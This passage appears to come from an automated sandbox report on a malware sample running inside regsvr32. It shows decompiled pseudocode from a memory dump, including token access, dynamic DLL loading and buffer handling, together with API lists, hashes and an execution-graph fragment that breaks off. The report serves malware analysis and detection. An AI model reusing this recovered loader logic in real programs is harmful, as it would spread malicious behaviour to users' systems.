                                                                                                                                                                        								_t259 = _t254 - _t167;
                                                                                                                                                                        								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                        								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                        								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                        								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        								_t170 =  *_t103;
                                                                                                                                                                        								_t273 = _t273 + 0xc;
                                                                                                                                                                        								__eflags = _t170 - 2;
                                                                                                                                                                        								if(_t170 < 2) {
                                                                                                                                                                        									_t172 = _t170 + 1;
                                                                                                                                                                        									__eflags = _t172;
                                                                                                                                                                        									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t145 = _v16 +  *_t106;
                                                                                                                                                                        								__eflags = _t145;
                                                                                                                                                                        								_a4 =  *_t272;
                                                                                                                                                                        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        								_t234 =  *_t108;
                                                                                                                                                                        								_v8 = _t234;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t255 = _a4;
                                                                                                                                                                        						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                        						__eflags = _t145 - _t220;
                                                                                                                                                                        						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                        						_t146 = _t221;
                                                                                                                                                                        						_a4 = _t221;
                                                                                                                                                                        						_t222 = _a8;
                                                                                                                                                                        						__eflags = _t146;
                                                                                                                                                                        						if(_t146 != 0) {
                                                                                                                                                                        							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							E049F5FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t117 = _t272 + 0x6c;
                                                                                                                                                                        							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                        							__eflags =  *_t117;
                                                                                                                                                                        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        							_t234 =  *_t119;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                        						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                        							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                        						__eflags = _t257 - 0xffff;
                                                                                                                                                                        						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                        						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t151 =  *_t124;
                                                                                                                                                                        						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        						_t235 = _t234 -  *_t125;
                                                                                                                                                                        						__eflags = _t258 - _t151;
                                                                                                                                                                        						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                        						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                        						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                        							L49:
                                                                                                                                                                        							__eflags = _t235 - _t258;
                                                                                                                                                                        							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                        							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                        							__eflags = _t222 - 4;
                                                                                                                                                                        							if(_t222 != 4) {
                                                                                                                                                                        								L53:
                                                                                                                                                                        								_t269 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t161 =  *_t272;
                                                                                                                                                                        								__eflags =  *(_t161 + 4);
                                                                                                                                                                        								_t154 = _a4;
                                                                                                                                                                        								if( *(_t161 + 4) != 0) {
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _t154 - _t235;
                                                                                                                                                                        									if(_t154 != _t235) {
                                                                                                                                                                        										goto L53;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t269 = _t222 - 3;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							E049F7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                        							_t134 = _t272 + 0x5c;
                                                                                                                                                                        							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                        							__eflags =  *_t134;
                                                                                                                                                                        							E049F5E80( *_t134,  *_t272);
                                                                                                                                                                        						} else {
                                                                                                                                                                        							__eflags = _t235;
                                                                                                                                                                        							if(_t235 != 0) {
                                                                                                                                                                        								L46:
                                                                                                                                                                        								__eflags = _t222;
                                                                                                                                                                        								if(_t222 != 0) {
                                                                                                                                                                        									_t162 =  *_t272;
                                                                                                                                                                        									__eflags =  *(_t162 + 4);
                                                                                                                                                                        									if( *(_t162 + 4) == 0) {
                                                                                                                                                                        										__eflags = _t235 - _t258;
                                                                                                                                                                        										if(_t235 <= _t258) {
                                                                                                                                                                        											goto L49;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								__eflags = _t222 - 4;
                                                                                                                                                                        								if(_t222 == 4) {
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("sbb edi, edi");
                                                                                                                                                                        						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                        						__eflags = _t271;
                                                                                                                                                                        						return _t271;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__eflags = _t218 - 4;
                                                                                                                                                                        						if(_t218 == 4) {
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t173 =  *_t272;
                                                                                                                                                                        							__eflags =  *(_t173 + 4);
                                                                                                                                                                        							if( *(_t173 + 4) != 0) {
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        								__eflags = _t254 -  *_t88;
                                                                                                                                                                        								if(_t254 !=  *_t88) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return 3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}






















































                                                                                                                                                                        0x049f41e9
                                                                                                                                                                        0x049f41ee
                                                                                                                                                                        0x049f41f1
                                                                                                                                                                        0x049f41f6
                                                                                                                                                                        0x049f41fa
                                                                                                                                                                        0x049f41fe
                                                                                                                                                                        0x049f4201
                                                                                                                                                                        0x049f4204
                                                                                                                                                                        0x049f420d
                                                                                                                                                                        0x049f4214
                                                                                                                                                                        0x049f4217
                                                                                                                                                                        0x049f421a
                                                                                                                                                                        0x049f421f
                                                                                                                                                                        0x049f4224
                                                                                                                                                                        0x049f4227
                                                                                                                                                                        0x049f422a
                                                                                                                                                                        0x049f422a
                                                                                                                                                                        0x049f422e
                                                                                                                                                                        0x049f4237
                                                                                                                                                                        0x049f423e
                                                                                                                                                                        0x049f4241
                                                                                                                                                                        0x049f4246
                                                                                                                                                                        0x049f424b
                                                                                                                                                                        0x049f424b
                                                                                                                                                                        0x049f424e
                                                                                                                                                                        0x049f4253
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4177
                                                                                                                                                                        0x049f4179
                                                                                                                                                                        0x049f4186
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4186
                                                                                                                                                                        0x049f4179
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f4175
                                                                                                                                                                        0x049f4259
                                                                                                                                                                        0x049f425e
                                                                                                                                                                        0x049f4261
                                                                                                                                                                        0x049f4264
                                                                                                                                                                        0x049f430f
                                                                                                                                                                        0x049f430f
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426a
                                                                                                                                                                        0x049f426f
                                                                                                                                                                        0x049f4299
                                                                                                                                                                        0x049f429c
                                                                                                                                                                        0x049f429c
                                                                                                                                                                        0x049f42a1
                                                                                                                                                                        0x049f42a3
                                                                                                                                                                        0x049f42a5
                                                                                                                                                                        0x049f42a8
                                                                                                                                                                        0x049f42ab
                                                                                                                                                                        0x049f42b3
                                                                                                                                                                        0x049f42b8
                                                                                                                                                                        0x049f42b8
                                                                                                                                                                        0x049f42be
                                                                                                                                                                        0x049f42c1
                                                                                                                                                                        0x049f42c4
                                                                                                                                                                        0x049f42c7
                                                                                                                                                                        0x049f42c9
                                                                                                                                                                        0x049f42c9
                                                                                                                                                                        0x049f42ca
                                                                                                                                                                        0x049f42ca
                                                                                                                                                                        0x049f42c7
                                                                                                                                                                        0x049f42d8
                                                                                                                                                                        0x049f42db
                                                                                                                                                                        0x049f42df
                                                                                                                                                                        0x049f42e4
                                                                                                                                                                        0x049f42e7
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ea
                                                                                                                                                                        0x049f42ed
                                                                                                                                                                        0x049f42ed
                                                                                                                                                                        0x049f42f0
                                                                                                                                                                        0x049f42f0
                                                                                                                                                                        0x049f4271
                                                                                                                                                                        0x049f4271
                                                                                                                                                                        0x049f4281
                                                                                                                                                                        0x049f4284
                                                                                                                                                                        0x049f4289
                                                                                                                                                                        0x049f4289
                                                                                                                                                                        0x049f428c
                                                                                                                                                                        0x049f428f
                                                                                                                                                                        0x049f4292
                                                                                                                                                                        0x049f4294
                                                                                                                                                                        0x049f4294
                                                                                                                                                                        0x049f42f3
                                                                                                                                                                        0x049f42f5
                                                                                                                                                                        0x049f42f8
                                                                                                                                                                        0x049f42f8
                                                                                                                                                                        0x049f42fe
                                                                                                                                                                        0x049f4302
                                                                                                                                                                        0x049f4305
                                                                                                                                                                        0x049f4307
                                                                                                                                                                        0x049f4307
                                                                                                                                                                        0x049f4318
                                                                                                                                                                        0x049f431a
                                                                                                                                                                        0x049f431a
                                                                                                                                                                        0x049f4322
                                                                                                                                                                        0x049f4330
                                                                                                                                                                        0x049f4333
                                                                                                                                                                        0x049f4335
                                                                                                                                                                        0x049f4355
                                                                                                                                                                        0x049f4355
                                                                                                                                                                        0x049f4358
                                                                                                                                                                        0x049f435e
                                                                                                                                                                        0x049f435f
                                                                                                                                                                        0x049f4362
                                                                                                                                                                        0x049f4364
                                                                                                                                                                        0x049f4367
                                                                                                                                                                        0x049f436a
                                                                                                                                                                        0x049f436d
                                                                                                                                                                        0x049f4371
                                                                                                                                                                        0x049f4374
                                                                                                                                                                        0x049f4377
                                                                                                                                                                        0x049f437a
                                                                                                                                                                        0x049f437c
                                                                                                                                                                        0x049f437c
                                                                                                                                                                        0x049f437f
                                                                                                                                                                        0x049f4381
                                                                                                                                                                        0x049f4381
                                                                                                                                                                        0x049f4384
                                                                                                                                                                        0x049f4386
                                                                                                                                                                        0x049f4389
                                                                                                                                                                        0x049f4391
                                                                                                                                                                        0x049f4394
                                                                                                                                                                        0x049f4399
                                                                                                                                                                        0x049f4399
                                                                                                                                                                        0x049f439f
                                                                                                                                                                        0x049f43a2
                                                                                                                                                                        0x049f43a5
                                                                                                                                                                        0x049f43a7
                                                                                                                                                                        0x049f43a7
                                                                                                                                                                        0x049f43a8
                                                                                                                                                                        0x049f43a8
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b3
                                                                                                                                                                        0x049f43b6
                                                                                                                                                                        0x049f43b9
                                                                                                                                                                        0x049f43b9
                                                                                                                                                                        0x049f43bc
                                                                                                                                                                        0x049f43bc
                                                                                                                                                                        0x049f437f
                                                                                                                                                                        0x049f43bf
                                                                                                                                                                        0x049f43c2
                                                                                                                                                                        0x049f43c5
                                                                                                                                                                        0x049f43c7
                                                                                                                                                                        0x049f43ca
                                                                                                                                                                        0x049f43cc
                                                                                                                                                                        0x049f43cf

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 7f01a3e6c351eab75191d4abc7defdb4d85f75acdcc41ff26552c13d57dd1af7
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D112716006009FDB24CF69D9C0AAAB7E5FF98318B24893DE98ACB701D771F9448B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EC79E(void* __ecx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        
                                                                                                                                                                        				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t10 = _v8;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(GetLastError() != 0x3f0) {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t10 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t13 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t10;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 049EC7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,049EC8E3,00000000,049E0000), ref: 049EC7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: 34ff89e84737645b2153ab9281f2a4397d0c08c71887eb85dc717cb909ff0cfa
                                                                                                                                                                        • Instruction ID: a85d1f8d3743dacd5d0a438782bf5fdf7ccb7fe3a352cee88c429612b326a5a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 34ff89e84737645b2153ab9281f2a4397d0c08c71887eb85dc717cb909ff0cfa
                                                                                                                                                                        • Instruction Fuzzy Hash: 34F05E72604205AFDB019FA5D849FAA3BFCFB49340F040475F642E3140E765FE008BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E049ED218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v140;
                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                        				char _t15;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				WCHAR* _t34;
                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				char _t62;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				char _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __esi;
                                                                                                                                                                        				_t61 = __edi;
                                                                                                                                                                        				_t47 = __ebx;
                                                                                                                                                                        				_t50 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                        				_t14 =  *_t1;
                                                                                                                                                                        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                        					_t15 = E049E9DF2(_t50, 0x392);
                                                                                                                                                                        					_t66 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t62 = _t15;
                                                                                                                                                                        					_t67 = _t66 + 0xb0;
                                                                                                                                                                        					_v8 = _t62;
                                                                                                                                                                        					E049E9E51( &_v140, 0x40, L"%08x", E049EE2C5(_t66 + 0xb0, E049EA43D(_t66 + 0xb0), 0));
                                                                                                                                                                        					_t20 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                        					_t25 = E049E9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                        					_t26 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t68 = E049E9A5A(_t26 + 0x1020);
                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                        					E049E8BAF( &_v8);
                                                                                                                                                                        					_t32 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t34 = E049E9A5A(_t32 + 0x122a);
                                                                                                                                                                        					 *0x49ff91c = _t34;
                                                                                                                                                                        					_t35 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x49fc9a0,  &_v140, ".", L"dll", 0, 0x49fc9a0, _t25, 0x49fc9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                        					_t37 = LoadLibraryW( *0x49ff91c);
                                                                                                                                                                        					 *0x49ff914 = _t37;
                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push(_t37);
                                                                                                                                                                        						_t60 = 0x28;
                                                                                                                                                                        						_t38 = E049EF011(0x49fcb8c, _t60);
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x49ff918 = _t38;
                                                                                                                                                                        					E049E8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					E049E8D6D( &_v140, 0, 0x80);
                                                                                                                                                                        					if( *0x49ff918 != 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E049E8BF4(0x49ff91c, 0xfffffffe);
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					if( *0x49ff918 == 0) {
                                                                                                                                                                        						_t46 =  *0x49ff850; // 0x4bef9f0
                                                                                                                                                                        						 *0x49ff918 = _t46;
                                                                                                                                                                        					}
                                                                                                                                                                        					L10:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 7432676bab974880991e8a3fdc14a2c508b4f8f60337d7f7a3c2a250026c341d
                                                                                                                                                                        • Instruction ID: 96799c15c1b1b503c488224c623884d60ddfbae5bab2cbf4e73a4a8bf1c1dafe
                                                                                                                                                                        • Opcode Fuzzy Hash: 7432676bab974880991e8a3fdc14a2c508b4f8f60337d7f7a3c2a250026c341d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9431B5B1A042057FE711EB69EC45FBA37ECEB85318F648136F105D7180DA38EE858764
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049F3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                        				char _v5;
                                                                                                                                                                        				long long _v12;
                                                                                                                                                                        				short _v20;
                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                        				char _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				char** _t32;
                                                                                                                                                                        				long long _t40;
                                                                                                                                                                        				long long _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t40 = __fp0;
                                                                                                                                                                        				_t15 = E049F358D(_a4);
                                                                                                                                                                        				 *_t32 = "msxml3.dll";
                                                                                                                                                                        				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                        				_t16 = E049EA43D();
                                                                                                                                                                        				_t26 = 0xf;
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                        				if(_t16 > _t26) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                        					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                        					_t25 = _t25 + 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t26 = _t16;
                                                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							goto L2;
                                                                                                                                                                        						} while (_t25 < _t26);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				lstrlenW( &_v20);
                                                                                                                                                                        				_t29 = _a8;
                                                                                                                                                                        				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                        				_a12 = _t22;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t22 < 0) {
                                                                                                                                                                        					_t40 = _t40 +  *0x49fcf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a12 = _t28;
                                                                                                                                                                        				_v12 = _t40;
                                                                                                                                                                        				_t41 = _v12;
                                                                                                                                                                        				asm("fild dword [ebp+0x10]");
                                                                                                                                                                        				if(_t28 < 0) {
                                                                                                                                                                        					_t41 = _t41 +  *0x49fcf58;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = _t41;
                                                                                                                                                                        				asm("fmulp st1, st0");
                                                                                                                                                                        				L049F8935();
                                                                                                                                                                        				return _t29 - _t22;
                                                                                                                                                                        			}


















                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 049F36BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 049F36FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: ef272acf580fa697a18d7cffbdf626838d270d69ab5c70b2fa5421a2a10dd4bb
                                                                                                                                                                        • Instruction ID: 5eb3a00c36033a0ec9904c56e7fc7f658096b357ca592f5c10becabd21d4a952
                                                                                                                                                                        • Opcode Fuzzy Hash: ef272acf580fa697a18d7cffbdf626838d270d69ab5c70b2fa5421a2a10dd4bb
                                                                                                                                                                        • Instruction Fuzzy Hash: F8112132A0428DABCF10AFA8EC051DE7FB5FF94310B268A79DD1592281EB34E564C781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:46
13988 536224d 13987->13988 13989 5368bf4 2 API calls 13988->13989 13997 5362259 13989->13997 13990 5362281 13993 5369c2c 2 API calls 13990->13993 13991 5369a5a RtlAllocateHeap lstrcatW 14001 53620db 13991->14001 13992 5362276 13995 5368bf4 2 API calls 13992->13995 13993->13996 13994 5368bf4 2 API calls 13994->13997 13995->13990 13997->13990 13997->13992 13997->13994 13998 5369df2 lstrlenA RtlAllocateHeap 13998->14001 13999 5368baf HeapFree memset 13999->14001 14000 536b5fb memset GetExitCodeProcess 14000->14001 14001->13983 14001->13991 14001->13998 14001->13999 14001->14000 14002 5368bf4 HeapFree memset 14001->14002 14002->14001 14004 5369ac6 14003->14004 14025 5368bde RtlAllocateHeap 14004->14025 14006 5369b07 lstrcatA 14008 5369afc 14006->14008 14009 5369b1b lstrcatA 14006->14009 14007 536207d 14007->13980 14007->13996 14008->14006 14008->14007 14009->14008 14026 5368bde RtlAllocateHeap 14010->14026 14012 536c0d1 14013 53698bd RtlAllocateHeap 14012->14013 14024 536c155 14012->14024 14014 536c0ef 14013->14014 14015 53698bd RtlAllocateHeap 14014->14015 14016 536c102 14015->14016 14017 53698bd RtlAllocateHeap 14016->14017 14018 536c116 14017->14018 14019 5369df2 2 API calls 14018->14019 14020 536c123 14019->14020 14021 5368baf 2 API calls 14020->14021 14022 536c149 14021->14022 14023 53698bd RtlAllocateHeap 14022->14023 14023->14024 14024->14001 14025->14008 14026->14012 14040 5361301 14041 536a91d 4 API calls 14040->14041 14042 5361318 14041->14042 14043 536133d 14042->14043 14044 5373674 2 API calls 14042->14044 14045 53611e9 5 API calls 14043->14045 14044->14043 14046 5361366 14045->14046 14047 536a9f0 4 API calls 14046->14047 14066 5361372 14046->14066 14048 5361382 14047->14048 14049 5367b4d 50 API calls 14048->14049 14077 5361440 14048->14077 14051 53613a0 14049->14051 14050 536b179 4 API calls 14052 5361457 14050->14052 14057 536a9f0 4 API calls 14051->14057 14060 53613a9 14051->14060 14070 53613dd 14051->14070 14053 536b266 5 API calls 14052->14053 14054 
